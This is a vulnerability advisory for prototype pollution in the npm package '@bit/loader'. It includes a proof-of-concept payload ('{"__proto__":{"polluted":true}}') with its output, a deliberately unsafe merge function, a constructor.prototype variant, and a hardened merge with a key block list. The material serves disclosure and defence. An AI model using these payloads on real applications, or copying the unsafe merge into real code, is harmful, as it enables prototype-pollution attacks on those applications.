Affected versions of this package are vulnerable to Prototype Pollution. The merge invoked in the M function is unsafe: the e argument it merges is not checked for a key that resolves to the object prototype (an own __proto__ key, as produced by JSON.parse). When such an argument is merged into an empty object, the merge operation copies the malicious property onto Object.prototype, and because that prototype is shared, the property then appears on every object in the program.
(async () => {
  // Dynamically import the affected package; the vulnerable merge runs in its default export.
  const lib = await import('@bit/loader');
  // JSON.parse creates an own "__proto__" property instead of setting the object's prototype.
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.default(BAD_JSON);
  } catch (e) { }
  // victim is never touched directly; the property arrives through Object.prototype.
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
This package has no security update for the mentioned vulnerability; therefore, users should ensure proper sanitization and validation of user-supplied inputs, blocking inputs containing __proto__ or constructor.prototype keys. The check has to be applied to every key at every nesting level, since the dangerous key can appear inside a nested object.
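To make the mitigation concrete, the following is an added JavaScript example, not code from @bit/loader or from this advisory. It shows a recursive merge of the unsafe kind described above (an illustrative assumption about the shape of the vulnerable merge, not the package's actual M function), a hardened merge that refuses the __proto__, constructor and prototype keys, and a JSON.parse reviver that strips those keys from untrusted input before it reaches any merge. The names unsafeMerge, safeMerge, parseUntrustedJson and pollutes are the example's own; the payload is constructed to match the proof of concept above.

```javascript
// Added example (not the package's own code). The unsafe merge below is an
// assumed, illustrative shape of the vulnerable merge, not @bit/loader's code.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Unsafe: copies every own key of `source` into `target`, recursing into objects.
// JSON.parse gives `source` an own key named "__proto__"; reading target["__proto__"]
// on a plain object resolves to Object.prototype, so the nested properties are
// written onto the prototype shared by every object in the program.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (typeof target[key] !== 'object' || target[key] === null) {
        target[key] = {};
      }
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// True only for objects whose prototype is Object.prototype or null.
function isPlainObject(v) {
  if (v === null || typeof v !== 'object') return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Hardened: skip the keys through which a merge can reach a prototype, recurse only
// into plain objects, and only into an own property of the target (never an
// inherited one), at every nesting level.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Input-side filter: parse untrusted JSON and drop the dangerous keys before the data
// reaches any merge. A reviver that returns undefined deletes that key, and the
// reviver visits every key at every depth.
function parseUntrustedJson(text) {
  return JSON.parse(text, (key, value) => (FORBIDDEN_KEYS.has(key) ? undefined : value));
}

// Runs a payload through `mergeFn` into a fresh object and reports whether the shared
// prototype was polluted, observed through an unrelated object. Cleans up afterwards
// so later checks start from a clean prototype.
function pollutes(mergeFn, payloadText, parse = JSON.parse) {
  const victim = {};
  try {
    mergeFn({}, parse(payloadText));
  } catch (e) { /* a merge that throws also counts as not polluting */ }
  const polluted = victim.polluted === true;
  delete Object.prototype.polluted;
  return polluted;
}

// Constructed payloads: the advisory's proof-of-concept shape and the constructor.prototype variant.
const BAD_JSON = '{"__proto__":{"polluted":true}}';
const CTOR_JSON = '{"constructor":{"prototype":{"polluted":true}},"ok":1}';

console.log('unsafeMerge pollutes:', pollutes(unsafeMerge, BAD_JSON));                      // true
console.log('safeMerge pollutes:', pollutes(safeMerge, BAD_JSON));                          // false
console.log('unsafeMerge on filtered input pollutes:', pollutes(unsafeMerge, BAD_JSON, parseUntrustedJson)); // false
console.log('keys left after filtering:', Object.keys(parseUntrustedJson(CTOR_JSON)));      // [ 'ok' ]
```

Either defence alone stops the proof-of-concept payload; applying the input filter in addition to a hardened merge is cheap and protects any other merge in the dependency tree that has not been fixed.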
Update: Disclosed publicly following four months of no response from the maintainer.